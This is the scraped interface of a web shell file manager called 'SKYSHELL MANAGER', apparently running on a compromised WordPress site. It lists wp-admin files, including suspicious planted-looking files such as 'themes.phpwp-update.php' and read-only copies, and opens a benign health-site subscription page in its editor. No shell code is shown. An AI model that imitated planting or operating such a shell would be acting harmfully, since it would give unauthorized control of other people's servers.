📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-tags.php
21.98 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets.php
1.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: subscribe.php
<!DOCTYPE html> <!--[if lt IE 7 ]><html class="ie ie6" lang="en"> <![endif]--> <!--[if IE 7 ]><html class="ie ie7" lang="en"> <![endif]--> <!--[if IE 8 ]><html class="ie ie8" lang="en"> <![endif]--> <!--[if (gte IE 9)|!(IE)]><!--><html lang="en"> <!--<![endif]--> <head> <!-- Basic Page Needs ================================================== --> <meta charset="utf-8"> <title>Easyway Healthy</title> <link rel="icon" type="images/png" href="images/fav.png"> <meta name="Easyway Healthy" content="www.easywayhealthy.com"> <!-- Mobile Specific Metas ================================================== --> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <!-- CSS ================================================== --> <link rel="stylesheet" href="css/zerogrid.css"> <link rel="stylesheet" href="css/style.css"> <!-- Custom Fonts --> <link href="font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css"> <link rel="stylesheet" href="css/menu.css"> <script src="js/jquery1111.min.js" type="text/javascript"></script> <script src="js/script.js"></script> <!-- Owl Carousel Assets --> <link href="owl-carousel/owl.carousel.css" rel="stylesheet"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script> <script src="js/min.js"></script> <script> function subscribe() { var email=jQuery('#email').val(); jQuery.ajax( { type: 'POST', url: 'sub.php', data: jQuery('#subform').serialize(), success: function(data){ jQuery('#out').html(data); } }); $('#subform')[0].reset(); return false; } </script> <script> $(document).ready(function() { $("#button").toggle(function() { $(this).text('Hide Content'); }, function() { $(this).text('More Fields'); }).click(function(){ $("#hidden_content").slideToggle("slow"); }); }); </script> <style> #privacy{ margin-top: -20px; } #checkbox{ -webkit-margin-after: -20px; background: #9bb70d; } </style> </head> <body class="contact-page"> <div class="wrap-body"> <header> <div class="top-header"> <div class="zerogrid"> <div class="row"> <div class="col-1-3"> <div class="wrap-col"> <span><i class="fa fa-map-marker"></i> <strong>4076 Coal Road </strong>,Valley View, PA 17983</span> </div> </div> <div class="col-1-3"> <div class="wrap-col"> <span><i class="fa fa-phone"></i> 570-682-7618</span> </div> </div> <div class="col-1-3"> <div class="wrap-col"> <span><i class="fa fa-envelope"></i> info@easywayhealthy.com</span> </div> </div> </div> </div> </div> <div class="logo"> <a href='index.php' class="logo"><img src="images/logo.png" /></a> <span>The Best Health Grow Your Strength</span> </div> <div id="cssmenu" class="t-left"> <ul> <li><a href="index.php"><span>Home</span></a></li> <!-- <li class="active"><a href="meditation.php"><span>Meditation</span></a></li>--> <li class="last"><a href="meditation.php"><span>Meditation</span></a></li> <li class="last"><a href="yoga.php"><span>Yoga</span></a></li> <li class="last"><a href="exercise-every-day.php"><span>Exercise every day</span></a></li> <li class="last"><a href="subscribe.php"><span>Subscribe</span></a></li> <li class="last"><a href="contact.php"><span>Contact us</span></a></li> </ul> </div> <div id="owl-slide" class="owl-carousel"> <div class="item"> <img src="images/s.jpg" /> <!-- Static Header --> <div class="header-text hidden-xs"> <div class="col-md-12 text-left"> <h1>MEDITATION</h1> <p>What Happens To The Brain When You Meditate</p> <a class="button" href="meditation.php">Read More</a> </div> </div><!-- /header-text --> </div> <div class="item"> <img src="images/s2.jpg" /> <!-- Static Header --> <div class="header-text hidden-xs"> <div class="col-md-12 text-left"> <h1>YOGA</h1> <p>Why You Should Try Yoga Today...</p> <a class="button" href="yoga.php">Read More</a> </div> </div><!-- /header-text --> </div> <div class="item"> <img src="images/s3.jpg" /> <!-- Static Header --> <div class="header-text hidden-xs"> <div class="col-md-12 text-left"> <h1>EXERCISE</h1> <p>Why You Should Exercise Every Day</p> <a class="button" href="exercise-every-day.php">Read More</a> </div> </div><!-- /header-text --> </div> </div> </header> <!--////////////////////////////////////Container--> <section id="container"> <div class="wrap-container"> <!-----------------Content-Box--------------------> <section class="content-box zerogrid"> <div class="row wrap-box"><!--Start Box--> <h3 class="t-center" style="font-size: 30px;margin: 10px 0 30px">Subscribe us</h3> <!--Start Map --> <img src="images/sub1.jpg" class="img-responsive"/> <!--End Map--> <div id="contact_form"> <form id="subform" name="subform" onSubmit="subscribe();return false;" class="contact-form"> <div class="form-group"> <label>FirstName</label> <input type="text" name="firstname" id="firstname" class="form-control" required="required" pattern= ^[a-zA-Z\s]+$> </div> <div class="form-group"> <label>LastName </label> <input type="text" name="lastname" id="lastname" class="form-control" required="required" pattern= ^[a-zA-Z\s]+$> </div> <div class="form-group"> <label>Email </label> <input type="email" name="email" id="email" class="form-control" required="required" pattern= ^([0-9a-zA-Z]([-.\w]*[0-9a-zA-Z])*@([0-9a-zA-Z][-\w]*[0-9a-zA-Z]\.)+[a-zA-Z]{2,9})$> </div> <div class="form-group"> <label>Gender </label> <select name="gender" id="gender" class="form-control"><option>Male</option><option>Female</option></select> </div> <div id="hidden_content"> <div class="form-group"> <label>Date of Birth</label> <input type="dob" name="dob" id="dob" class="form-control" placeholder="mm/dd/yyyy" pattern= ^(1[0-2]|0?[1-9])/(3[01]|[12][0-9]|0?[1-9])/(?:[0-9]{2})?[0-9]{2}$> </div> <br> </div> <div id="privacy" class="form-group"> <label> <input type="checkbox" name="checkbox" id="checkbox">I have read and agree to the <a href="policy.html" style="text-decoration:none" target="_blank">Privacy Policy</a> and <a href="terms.html" target="_blank">Terms and Conditions</a> </label> </div> <!-- <input type="submit" class="mybutton" value="Submit"> <input type="button" id="button" class="mybutton" value="Moredetails"> <input type='hidden' name='key' id='key' value='2'> <div id="out" style="font-size:17px; padding-top: 36px; text-align:center; padding-left:10%; color:#000;"></div>--> <div class="form-group" style="float:left; margin-left: 0%; margin-top: 8%; margin-right: 3%;"> <input type="submit" name="submit" value="submit" class="btn btn-primary btn-lg"> </div> </div> <input type='hidden' name='key' id='key' value='2'> <div id="out" style="font-size:17px; padding-top: 36px; text-align:center; padding-left:10%; color:#000;"></div> </form> </div> </div> </section> <script> var expanded = false; function showCheckboxes() { var checkboxes = document.getElementById("checkboxes"); if (!expanded) { checkboxes.style.display = "block"; expanded = true; } else { checkboxes.style.display = "none"; expanded = false; } } </script> </div> </section> <!--////////////////////////////////////Footer--> <footer> <div class="zerogrid wrap-footer"> <div class="row"> <div class="col-1-4 col-footer-2"> <div class="wrap-col"> <h3 class="widget-title">Recent Post</h3> <ul> <li><a href="post1.php">10 Reasons You Should Never Start A Yoga Practice</a></a></li> <li><a href="post2.php">5 Health Benefits of Legs Up the Wall Posture</a></li> <li><a href="post3.php">7 Fabulous Yoga Poses to Increase Your Libido</a></li> <li><a href="post5.php">3 ways to stay consistent with your workouts</a></li> </ul> </div> </div> <div class="col-1-4 col-footer-2"> <div class="wrap-col"> <h3 class="widget-title">About Us</h3> <ul> <li><a href="#">We provide online service to get healthy tips and use of meditation, yoga, etc...</a></li> <li><a href="#">For all online suffering peoples. You can call us Easyway Healthy aggregators.</a></li> <li><a href="#">We have become a one stop free healthy tips, working and genuine tips. Our website is highly skilled and we provide 24 x 7 service.</a></li> </ul> </div> </div> <div class="col-1-4 col-footer-2"> <div class="wrap-col"> <h3 class="widget-title">Health benefits of meditation</h3> <ul> <li><a href="#">Lowers high blood pressure</a></li> <li><a href="#">Lowers the levels of blood lactate, reducing anxiety attacks</a></li> <li><a href="#">Increases serotonin production that improves mood and behavior</a></li> <li><a href="#">Improves the immune system</a></li> </ul> </div> </div> <!--<div class="col-1-4 col-footer-3"> <div class="wrap-col"> <h3 class="widget-title">Tag Cloud</h3> <a href="#">animals</a> <a href="#">cooking</a> <a href="#">countries</a> <a href="#">city</a> <a href="#">children</a> <a href="#">home</a> <a href="#">likes</a> <a href="#">photo</a> <a href="#">link</a> <a href="#">law</a> <a href="#">shopping</a> <a href="#">skate</a> <a href="#">scholl</a> <a href="#">video</a> <a href="#">travel</a> <a href="#">images</a> <a href="#">love</a> <a href="#">lists</a> <a href="#">makeup</a> <a href="#">media</a> <a href="#">password</a> <a href="#">pagination</a> <a href="#">wildlife</a> </div> </div> --> <div class="col-1-4 col-footer-2"> <div class="wrap-col"> <h3 class="widget-title">Contact Us</h3> <div class="row"> <ul> Address: <li><a href="#">4076 Coal Road,Valley Vie ,PA 17983.</a></li> Support: <li><a href="#">Mail:info@easywayhealthy.com</a></li> <li><a href="#">Phone - 570-682-7618</a></li> </div> </div> </div> </div> </div> <div class="copyright"> <div class="zerogrid wrapper"> Copyright @ 2017 easywayhealthy.com || All rights reserved. <a href="https://www.zerotheme.com" title="free website templates"></a> <ul class="quick-link"> <li><a href="unsubscribe.php">Unsubscribe</a></li> <li><a href="privacy.php">Privacy Policy</a></li> <li><a href="terms.php">Terms of Use</a></li> </ul> </div> </div> </footer> </div> </body> </html>
Save